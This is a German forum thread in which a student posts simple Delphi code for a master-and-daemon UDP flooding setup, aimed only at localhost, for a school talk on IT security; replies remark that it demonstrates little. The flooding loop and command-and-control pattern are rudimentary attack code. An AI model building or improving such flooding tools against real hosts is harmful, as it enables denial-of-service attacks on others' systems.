Ergebnis 1 bis 5 von 5

Thema: UDP-Flooding

  1. #1
    Anfänger
    Registriert seit
    24.09.2010
    Beiträge
    10

    Idee UDP-Flooding

    Moin,

    ich habe demnächst einen Vortrag in meiner Klasse indem es über IT-Sicherheit geht. Vorrangig möchte ich eine der simpelsten Attacken, im Internet, in einem Beispiel zeigen(UDP-Flooding).
    Hierbei geht es nur um die Funktionsweise der Attacke und ihre Auswirkungen.


    Mein Deamon:

    Code:
    Const MeinPort=12345;
    
    Procedure DDos;
    begin
      while Form1.Active do
      begin
        Form1.UDPClient.Send('127.0.0.1',MeinPort,'Hallo'); //IP war nur ein Test
      end;
    end;
    
    procedure TForm1.ButtonBeendenClick(Sender: TObject);
    begin
    Close;
    end;
    
    procedure TForm1.Client1Read(Sender: TObject; Socket: TCustomWinSocket);
    begin
    DDos;
    end;
    
    procedure TForm1.FormCreate(Sender: TObject);
    begin
    Client1.Port:=MeinPort;
    Client1.Host:='127.0.0.1'; //IP war nur ein Test
    Client1.Active:=True;
    end;
    Mein Master:

    Code:
    Const MeinPort=12345;
    
    procedure TForm1.ButtonDDosClick(Sender: TObject);
      var
        i: Integer;
    begin
      for i := 0 to Server1.Socket.ActiveConnections-1 do
        Server1.Socket.Connections[i].SendText('A');
    end;
    
    procedure TForm1.FormCreate(Sender: TObject);
    begin
    Server1.Port:=MeinPort;
    Server1.Open;
    end;
    Entschuldigt bitte eventuelle Rechtschreibfehler sowie meine Fehler im Quelltext, ich besitze keine großartigen Kenntnisse in Delphi, versuche mich aber immer stets weiterzubilden.
    Ich bitte keine Kommentare wie "UDP-Flooding ist Skriptkiddy-Müll"
    Ich bitte um Verbesserungsvorschläge um es noch deutlicher und einfacher zu zeigen.
    Geändert von kampfgumi (20.12.2010 um 19:23 Uhr)

  2. #2
    Trojaner
    Registriert seit
    11.07.2009
    Beiträge
    65

    Standard

    ich habe keinen blassen, was du jetzt willst/etc...
    „Wer die Freiheit aufgibt um Sicherheit zu gewinnen, der wird am Ende beides verlieren.“

    Benjamin Franklin

  3. #3
    Anfänger
    Registriert seit
    24.09.2010
    Beiträge
    10

    Standard

    Mein Ziel ist es einfach mit einem simplen Skript die Funktionsweise des UDP-Flooding aufzuzeigen. Ich möchte von euch Verbesserungsvorschläge oder Hinweise Tut mir leid das ich das nicht erwähnt habe.

  4. #4

    Registriert seit
    17.06.2009
    Beiträge
    559

    Standard

    Zitat Zitat von kampfgumi Beitrag anzeigen
    Hierbei geht es nur um die Funktionsweise der Attacke und ihre Auswirkungen.
    Das einzige, was dieses Stück Code zeigt, ist, wie eine Methode einer vorgefertigten Komponente wiederholt aufgerufen wird.
    Mit einer Funktionsweise/Auswirkung hat das doch eher weniger zu tun

  5. #5
    Anfänger
    Registriert seit
    24.09.2010
    Beiträge
    10

    Standard

    Meine Schule -> Berufsschule
    Mein Schulgang -> Kaufmännischer Assi mit Fachhochschulreife Fachrichtung DV
    Meine Mitschüler -> "Ey man du hast Inis aus UND Internet, du Häcka"
    Es soll seeehr einfach gehalten werden

Ähnliche Themen

  1. [VB6] Flooding via Webbrowser!?
    Von Z o D im Forum VisualBasic
    Antworten: 2
    Letzter Beitrag: 21.08.2009, 07:34

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
crypt.blue